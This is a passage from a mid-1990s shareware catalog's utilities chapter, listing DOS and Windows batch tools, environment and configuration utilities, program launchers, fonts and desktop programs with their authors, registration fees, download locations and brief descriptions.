1.10 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: EMAN110.ZIP on BBSs (call 813-371-2490 to download it + at no charge). + Download size: 34k (about three minutes with a 2400 baud modem) + Description: + An environment utility that accomplishes two major function. + First - display all current environment strings and data about + the environment such as the location, size and space + availability of the Master environment. Second - let a batch + file know how much environment space is currently available and + to provide a graceful exit if there isn't enough. It may also + show under certain circumstances the size of the master + environment can be expanded without changes being made to + CONFIG.SYS. + + + Product: File Finder/Grouper + The best file finder! Find & process files. See full + description on page 26. + + Chapter 2, "Utilities" 97 + + + + Product: FileMod + Author: Lincoln Beach Software (Harold Holmes), 314-861-1500 + Version: 1.2 (06-17-95) + Needs: IBM PC, DOS 3.1 or better. + Registration fee: $10.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: FILEMD12.ZIP on BBSs (call 317-784-2147 to download it + at no charge); FILEMD.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 0 (or contact userID 70700,630 for assistance). + Download size: 15k (about one minute with a 2400 baud modem) + Description: + Can make modifications to your systems files from within a + batch file or at the command line. Updates FILES, BUFFERS, + PATH, add/remove lines, modify parameters, remark out lines and + more.... + + + Product: HandyDOS + File/disk, prof batching, video & menu utils. See full + description on page 109. + + Product: Keyboard Express + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 1.1 (02-10-96) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM. + Registration fee: $24.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: KEYEX110.ZIP on BBSs; KEYEX.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A Windows Keyboard Macro. Simply enter in text or auto-capture + for easy playback. Assign up to 288 hot keys with up to 5000 + keystrokes each. Easily add, modify, delete and copy hot keys. + Add current date and time to keystrokes-for example: easily + paste current date and return address into your word processor. + Program runs transparent in the background. + + Chapter 2, "Utilities" 98 + + + + Product: MENU_MAN + Author: MicroMetric (David Groome), 813-377-2515 + Version: 2.00 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: MMAN200.ZIP on BBSs (call 813-371-2490 to download it + at no charge). + Download size: 64k (about five minutes with a 2400 baud modem) + Description: + Allows the display of user selection menus from within batch + files. These menus are controlled by command line options and + can contain a title and up to nineteen selection option lines + that are generated from REM lines in the batch file which + follows the call to MENU-MAN. Options include either selection + or check-box menus, a user response time limit, menu + positioning, erasing the screen before/after menu display, and + menu sound, color and type customization. + + + Product: MicroFox DOS Utilities + DOS Utilities for Printers, screens, files. See full + description on page 27. + + Product: PALERT + Author: Patri-Soft (Norm Patriquin), 909-352-2820 + Version: 2.4 (10-22-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PALERT24.ZIP on BBSs (call 714-352-2825 to download it + at no charge). + Download size: 27k (about two minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + A batch file utility designed to check your disk freespace + before starting an application. Specify how much disk + freespace you need for a program and it insures you have it + before starting an application. Don't be caught in your + wordprocessor or spreadsheet with a file that is too big to be + saved. Put it in your AUTOEXEC.BAT file to warn you when your + hard disk is getting full. Presents a graphical representation + of space to let you quickly determine freespace levels. + + Chapter 2, "Utilities" 99 + + + + Product: PATH_MAN + Author: MicroMetric (David Groome), 813-377-2515 + Version: 1.15 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: PMAN115.ZIP on BBSs (call 813-371-2490 to download it + at no charge). + Download size: 35k (about three minutes with a 2400 baud modem) + Description: + A utility that searches the directory path elements of the PATH + statement for a given file. The search file name may include + DOS wildcard characters. The ERRORLEVEL variable is set, based + on the results of this search, to allow more user friendly + batch files - a graceful exit can be made when needed data + files or programs are missing. Optionally, the path element on + which the search file is located may be displayed. + + + Product: PDAILY + Author: Patri-Soft (Norm Patriquin), 909-352-2820 + Version: 1.0 (10-10-86) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $14.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PDAILY.ZIP on BBSs (call 909-352-2825 to download it at + no charge); PDAILY.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 76347,2477 for assistance). + Download size: 11k (about one minute with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Lets users execute one or more DOS batch commands once per day. + Use it when you execute a batch command multiple times per day + but want selected commands to execute only once. For instance + backup or disk cleanup. Can be implemented in your + AUTOEXEC.BAT file. + + + Product: QIC-BAT for CMS + Enhancement software for Colorado tape drives. See full + description on page 32. + + Product: STACKEY + Keystroke stacking utility. See full description on page 57. + + Chapter 2, "Utilities" 100 + + + + Product: STEENBURGH's STUFF + Author: Tay-Jee Software Corporation (Chuck Steenburgh), + 540-464-4310 + Version: 3.5 (02-01-96) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $24.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6); disks of other shareware; + discounts on other products. + Look for: SSTUFF??.ZIP on BBSs; SSTUFF??.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0 (multiple files) (or contact userID + 72330,1776 for assistance). + SWREG#: 1170 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A collection of 23 batch file utilities. BATBOX is a simple but + useful menu system. CHKPRN returns printer status. CLK reports + the time/date with billions of formatting options. INPUT + displays fancy prompts and accepts input. MUSIC plays + transcribed sheet music, while SOUNDER produces billions of + different random tones. PALANTIR displays SVGA .GIF and .PCX + images. Support for direct manipulation of environment + variables. Many other useful functions provided. Supports + EGA/VGA. + + + 2.5.4.1 Batch file compilers + + See also: Computer programming, Languages. + + Chapter 2, "Utilities" 101 + + + + Product: PowerBatch + Author: CSD, Inc., 404-926-9565 + Version: 2.2 (05-15-94) + Needs: IBM PC, DOS 2.1 or better. 128k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $30.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of fax, CompuServe, mail support; 3-month return policy; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. + Look for: PWRBAT20.ZIP on BBSs; PWRBAT.EXE on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 72701,155 for + assistance). + SWREG#: 2335 + PsL#: 11265 + Download size: 255k (about 19 minutes with a 2400 baud modem) + Description: + Provides a replacement language for DOS batch files. If you can + write a DOS batch file you can create your own .EXE + replacement. More flexibility than batch files. Creates stand- + alone .EXE program, no enhancer file to drag along. Total color + control, fast screen writes, inputs from the keyboard, true + defined variables, program flow control, access to system info + (environ variables, disk types, file sizes, etc). Execute any + external non-TSR .EXE, .COM, .BAT or DOS command. Over 80 cmds. + + + 2.5.4.2 Program schedulers/launchers + + Product: BYWHEN + Author: W.S.B. Communications + Version: v1.11 (01-19-96) + Needs: IBM AT (80286), DOS 3.3 or better. VGA monitor; Hard + disk. + Registration fee: $39.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited fax, CompuServe, mail + support; 1-month limited return policy; site license; all ASP- + wide offers (see page 6). + Look for: availability unknown on BBSs; BYWHEN.ZIP on CompuServe + in CIS:ZDUTIL forum LIBrary 10 (or contact userID 73053,3202 + for assistance). + Download size: 44k (about four minutes with a 2400 baud modem) + Description: + An MSDOS/Netware aware program that executes programs [.com + .bat .exe] on specified date and time via command line + arguments or use INI file support in place of command line + arguments. Supports arguments for the program to + execute,screen blank, screen scroll, logs keys pressed/ + internetaddr while running, and international date & time. A + full functional non-crippled evaluation copy. It is not TSR. + + Chapter 2, "Utilities" 102 + + + + Product: JetLauncher + Author: Saturday*s Child (Froma Bessel), 516-671-3861 + Version: 1.1 (04-23-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $20.50 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, CompuServe, mail + support; 1-month limited return policy; all ASP-wide offers + (see page 6); discounts on upgrades. 3-month free upgrading + allowed. A genuine plastic/cardboard jet glider plane (rubber + bands not incl.). + Look for: availability unknown on BBSs; LAUNCH.ZIP on CompuServe + in CIS:OAFORUM forum LIBrary 12 (or contact userID 72550,2752 + for assistance). + SWREG#: 10954 + PsL#: 14564 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Think about it... how much time do YOU waste searching through + program groups looking for the right icon to click? + + This unobtrusive toolbar-like program launcher allows single- + click access to your most often used files and programs. An + intuitive interface with words instead of pictures easily + differentiates between files no matter what program created + them. + + Configure as many as twenty workgroups of up to ten programs + each to increase your productivity! + + + 2.5.5 Configuration utilities + + See also: Computer programming, Languages. + + Chapter 2, "Utilities" 103 + + + + Product: BOOT.SYS + Author: Salvisberg Software & Consulting (Hans Salvisberg) + Version: 2.10 (10-26-94) + Needs: IBM PC, DOS 2.11 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + 3-month limited return policy. Lifetime free upgrading + allowed. Free CompuServe IntroPak. + Look for: BOOT210.ZIP on BBSs (call 909-681-6221 to download it + at no charge); BOOTSY.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 73237,3556 for assistance); + BOOT210.ZIP on GEnie in IBMPC forum LIBrary 15. + PsL#: 10020 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Gives you one or more menus out of CONFIG.SYS to select your + configuration while you're booting up. Similar to DOS6 multi- + config - adds a pretty menu; if/then/else, use of variables, + and on-the-fly editing in CONFIG.SYS; reboot from cmd line; + passwords; installation program, automatically upgrades DOS6 + multi-config; more! Does not write to your disk! No resident + driver under DOS6! Up to 20 items per menu, 25 menus. MS/PC-DOS + 2.11 to 6.3, DR DOS 5.0/6.0, Novell DOS 7, supports DOS= cmd, + QEMM7. + + + Product: Bootit + Multi-boot/user defined HD specs. See full description on + page 90. + + Product: Button Manager for Windows + Icon-driven Windows application launcher. See full description + on page 159. + + Product: EZSET + A versatile printer setup utility. See full description on + page 79. + + Product: HiMOVE + Upper memory manager. See full description on page 56. + + Product: Program Group Specialist + Makes adding icons to Pgm Mgr simple. See full description on + page 160. + + Product: SHERLOCK + A dual window ASCII file comparison utility. See full + description on page 43. + + Chapter 2, "Utilities" 104 + + + + Product: Snooper + Author: Vias and Associates, 415-921-6262 + Version: 3.40 (06-21-95) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $39.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; lifetime return policy; discounts on upgrades. + Lifetime free upgrading allowed. + Look for: SNOOP340.ZIP on BBSs (call 904-335-7289 to download it + at no charge); SNOOPR.ZIP on CompuServe in CIS:PCHW forum + LIBrary 4 (or contact userID 72260,1601 for assistance). + SWREG#: 2535 + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + A powerful yet friendly system info utility. It shows CPU/NDP, + bus (incl. PCI), CPU speed, DOS, BIOS, memory, disks, video, + CD-ROM, env, keyboard, sound cards, ports, IDE model, CMOS + info, disk cache, Stacker, FILES= & BUFFERS=, IRQs, DMA, + modems, fax/modems, mice, port IRQs. Lets you edit CMOS, + CONFIG, & AUTOEXEC. Network info and benchmark screens, detects + 1100 MicroChannel cards. Auto-logging feature. Ideal for tech + support, HW inventory, & you! + + + Product: SuperSet - Environment Extender + Author: Ross Leidy + Version: 1.1 (02-01-95) + Needs: IBM PC, DOS 2.11 or better. + Registration fee: $12.95 + Registration benefits: Full program functionality; 12 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 12-month free upgrading allowed. + Look for: SSET11.ZIP on BBSs; SSET11.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 75122,1275 for + assistance). + SWREG#: 4556 + Download size: 30k (about two minutes with a 2400 baud modem) + Description: + A replacement for the DOS SET command. It lets you: + * Extend environment strings to any arbitrary length. No + more limit of 127 characters for the DOS PATH. + * Modify existing environment strings. + * Save environment snapshot files. Save and Restore your + entire environment in a single command. + * Manipulate Novell Netware drives in the PATH. + * Operate on Parent or Master environment block. + * Display your environment in an easy-to-read format. + + Chapter 2, "Utilities" 105 + + + + Product: Win Multiple Configurations + Author: JRE Enterprises + Version: 6.2 (10-05-94) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; EGA + monitor; Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $18.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 6); discounts on upgrades. 3-month free + upgrading allowed. + Look for: WMC62.ZIP on BBSs (call 602-814-0483 to download it at + no charge); WMC62.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 662 + Download size: 570k (about 43 minutes with a 2400 baud modem) + Description: + Allows up to 100 different Windows configurations to be saved + and restored. Create and save desktops specific for your + children, husband, wife, work partner, etc., or for any special + purposes you wish. Ability to specify files to be included in + each saved configuration. Ability to copy program manager + groups among saved configurations and ability to compress saved + configurations to save disk space. + + + 2.5.6 Recovery utilities + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 13. + + 2.5.7 Fonts + + Product: Fonter + Author: OsoSoft (George Campbell), 805-528-1759 + Version: 6.2 (04-15-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited fax, BBS, + CompuServe, mail support; lifetime return policy; all ASP-wide + offers (see page 6); discounts on upgrades. Lifetime free + upgrading allowed. + Look for: FONTER.ZIP on BBSs (call 805-528-3753 to download it at + no charge); FONTER.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + This award-winning program views and prints TT and ATM fonts in + many ways. See font samples, ANSI charts, keyboard display. + Print lists with samples, type specimens, ANSI charts, keyboard + + Chapter 2, "Utilities" 106 + + + + layouts. View font metric details. Preview and install TrueType + fonts too. Save any character as 72 pt. BMP file. This was the + first font viewer for Windows and is still one of the best. + + + 2.5.7.1 PostScript fonts + + Product: CJNFonts + Author: Christopher J. Noyes Software (Christopher J. Noyes), + 718-625-2262 + Version: 1.00 (11-19-94) + Needs: IBM AT (80286), Windows 3.1 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Dual 720k floppy drives; Hard disk; HP + DeskJet printer; HP LaserJet printer; Epson printer. + Registration fee: $25.00 (add $1.50 for shipping to U.S. + addresses) (add $1.50 for shipping to Canadian addresses) (add + $1.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; all ASP-wide offers (see page 6); + discounts on other products. + Look for: CJNFONT.ZIP on BBSs (call 718-625-0411 to download it + at no charge); CJNFNT.ZIP on CompuServe in CIS:NEWAGE forum + LIBrary 1 (or contact userID 71570,3055 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Truetype and Postscript versions. Fetures several Astrology + fonts and a general commercial symbol font. Contents: + AstGlyph-Astrological Glyphs & Symbols AstPi1--Astrological + Decorative Symbols CJNPI-General symbol font for general use. + + + Product: RRKeyCapsGerman (PST1) + Author: RoadRunner Computing (Elizabeth A. Swoope), 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RR-GP2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2730 + Download size: 85k (about seven minutes with a 2400 baud modem) + Description: + Complete 2-D German PC keycaps (RRKeyCapsGerman) and sampler + containing mixture of RRKeyLetters and RRWinSymbols for use in + PC docs. Designed by doc writer. Readable at body text sizes, + mnemonic and easy to use. + + Chapter 2, "Utilities" 107 + + + + Product: RRMacCaps & RRKeySampler (PST1) + Author: RoadRunner Computing (Elizabeth A. Swoope), 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RR-MP2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2728 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Complete 2-D Mac keycaps (RRMacCaps) and sampler containing + mixture of RRKeyLetters and RRWinSymbols for use in PC docs. + Designed by doc writer. Readable at body text sizes, mnemonic + and easy to use. + + + 2.5.7.2 TrueType fonts + + Product: CJNFonts + Truetype & Postscript fonts. See full description on page 106. + + Product: RISS Font Pak #1 + Author: Rhode Island Soft Systems, Inc., 401-767-3106 + Version: 1.3 (02-25-94) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $19.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, newsletter, mail support; 3-month return policy; + bonus fonts; all ASP-wide offers (see page 6); discounts on + other products; discounts on upgrades. + Look for: RISSFP1.ZIP on BBSs (call 401-767-3931 to download it + at no charge); RISSF1.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A collection of five decorative, specialty TrueType Fonts for + Windows 3.1. These are highly ornamental, original, exciting + fonts guaranteed to spruce up any document! Great for + headlines, and body text alike. Comes complete with fully + automated installation system - just run SETUP and everything + is done for you - it runs on "autopilot" and couldn't be + easier! Includes comprehensive documentation. + + Chapter 2, "Utilities" 108 + + + + Product: RRKeyCaps & RRKeySampler (PST1) + Author: RoadRunner Computing (Elizabeth A. Swoope), 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RR-PP2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2726 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Complete 2-D PC keycaps (RRKeyCaps) and sampler containing + mixture of RRKeyLetters and RRWinSymbols for use in PC docs. + Designed by doc writer. Readable at body text sizes, mnemonic + and easy to use. + + + Product: RRKeyCaps & RRKeySampler (TT) + Author: RoadRunner Computing (Elizabeth A. Swoope), 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RR-PT2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2725 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + Complete 2-D PC keycaps (RRKeyCaps) and sampler containing + mixture of RRKeyLetters and RRWinSymbols for use in PC docs. + Designed by doc writer. Readable at body text sizes, mnemonic + and easy to use. + + Chapter 2, "Utilities" 109 + + + + Product: RRKeyCapsGerman (TT) + Author: RoadRunner Computing (Elizabeth A. Swoope), 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RR-GT2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2729 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Complete 2-D German PC keycaps (RRKeyCapsGerman) and sampler + containing mixture of RRKeyLetters and RRWinSymbols for use in + PC docs. Designed by doc writer. Readable at body text sizes, + mnemonic and easy to use. + + + Product: RRMacCaps & RRKeySampler (TT) + Author: RoadRunner Computing (Elizabeth A. Swoope), 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RR-MT2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2727 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + Complete 2-D Mac keycaps (RRMacCaps) and sampler containing + mixture of RRKeyLetters and RRWinSymbols for use in PC docs. + Designed by doc writer. Readable at body text sizes, mnemonic + and easy to use. + + + 2.5.8 Other + + Product: CD-QUICK Cache + Small TSR makes your CD-ROM drive fast! See full description + on page 72. + + Product: CTS Serial Port Utilities + Serial port diagnositic and control utilities. See full + description on page 71. + + Chapter 2, "Utilities" 110 + + + + Product: HandyDOS + Author: Abri Technologies, Inc. + Version: 1.6 (10-22-92) + Needs: IBM PC, DOS 3.3 or better. 100k RAM. + Registration fee: $25.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + discounts on upgrades; registration commissions. + Look for: availability unknown on BBSs; HDOS.EXE on CompuServe in + CIS:PCUTIL forum LIBrary 3 (or contact userID 72345,1623 for + assistance). + Download size: 20k (about two minutes with a 2400 baud modem) + Description: + Twelve handy, well written DOS utilities for: file handling + (moving-deleting files & directories, WYSIWYG attribute + changing, etc.); batch programming (pop-up windows, cursor + moving, colour/sound); a stay-in-dos menu system; and a + versatile video & cursor checking/setting utility. A good demo + batch included. + + + Product: MEG SYSTEM INFO GRAPHS PIE 3-D + Author: Jim Tolliver, 203-322-0298 + Version: 3.5 (07-30-94) + Needs: IBM AT (80286), DOS 4.0 or better. 1024k RAM; VGA + monitor. + Registration fee: $20.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, CompuServe, mail support; 3-month return + policy; bonus utilities; all ASP-wide offers (see page 6). + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; MEG.ZIP on CompuServe in + CIS:PCHW forum LIBrary 2 (or contact userID 74213,163 for + assistance); MEG.ZIP on GEnie in PC forum LIBrary 0. + SWREG#: 2259 + PsL#: 11261 + Download size: 66k (about five minutes with a 2400 baud modem) + Description: + Simplifies your PC space for any disk (floppy, hard, network), + shows space as large easy-to-read pie and 3D graphs. Complete + space information is shown in megabytes. You will see 10 Meg + Free instead of xxx bytes. %Free, free, used and total. CPU + identified (including Pentium) and speed tested to .01 Mhz. + Mouse click to advance to next drive or use autoscan. System + info includes CD-ROM, extended memory, DOS and Windows + versions. Five built in screen savers. + + Chapter 2, "Utilities" 111 + + + + 2.6 Desktop utilities + + Product: Keyboard Express + Windows Keyboard Macro. See full description on page 97. + + Product: Kidproof for Windows + Author: Applied Softworks Inc., 408-554-1010 + Version: 1.0 (08-16-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $17.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; all ASP-wide + offers (see page 6); discounts on upgrades. + Look for: KIDPRO01.ZIP on BBSs (call 800-426-3425 to download it + at no charge); KIDPRO01.EXE on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 74131,2630 for assistance). + SWREG#: 7094 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + An application for kids and parents. It allows you, the parent, + to protect your programs when your child is using your PC. When + you launch it, you are starting a mini-desktop. You add + programs that you want your child to launch. When your child + launches programs, the real desktop, your own, is safe and + secure. Your child will not be able to access anything outside + of Kidproof. + + + Product: New Menus for Windows + X-Win/Win4 like shell and desktop enhancement. See full + description on page 152. + + Chapter 2, "Utilities" 112 + + + + Product: PCDESK + Author: Robert Lindsay Wells, 813-447-0604 + Version: 5.6 (01-17-96) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer; + math coprocessor. + Registration fee: $19.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + CompuServe, newsletter, mail support; 3-month limited return + policy; bonus utilities. 1 free update disk(s) sent out. + Look for: PCDESK56.ZIP on BBSs; PCDESK.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 7 (or contact userID 102507,3113 for + assistance). + SWREG#: 9181 + Download size: 179k (about 14 minutes with a 2400 baud modem) + Description: + A versatile program that generates monthly calendars and a + Weekly Planner to which you can add memo notes. Also generates + yearly calendars, and displays an analog clock. Includes an + address book data base, a DOS file manager and an ASCII text + editor. Mouse supported. Comes with on-line instructions. + + + Product: q&dBase for Windows + Database creation and maintenance program. See full + description on page 226. + + Product: SensuVoX I + WAV sets to give your PC a Sensual Voice. See full description + on page 165. + + Chapter 2, "Utilities" 113 + + + + Product: Silver Wolf Desktop + Author: Silver Wolf Software + Version: 1.2 (12-15-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 6 months of BBS, + CompuServe, mail support; bonus utilities; all ASP-wide offers 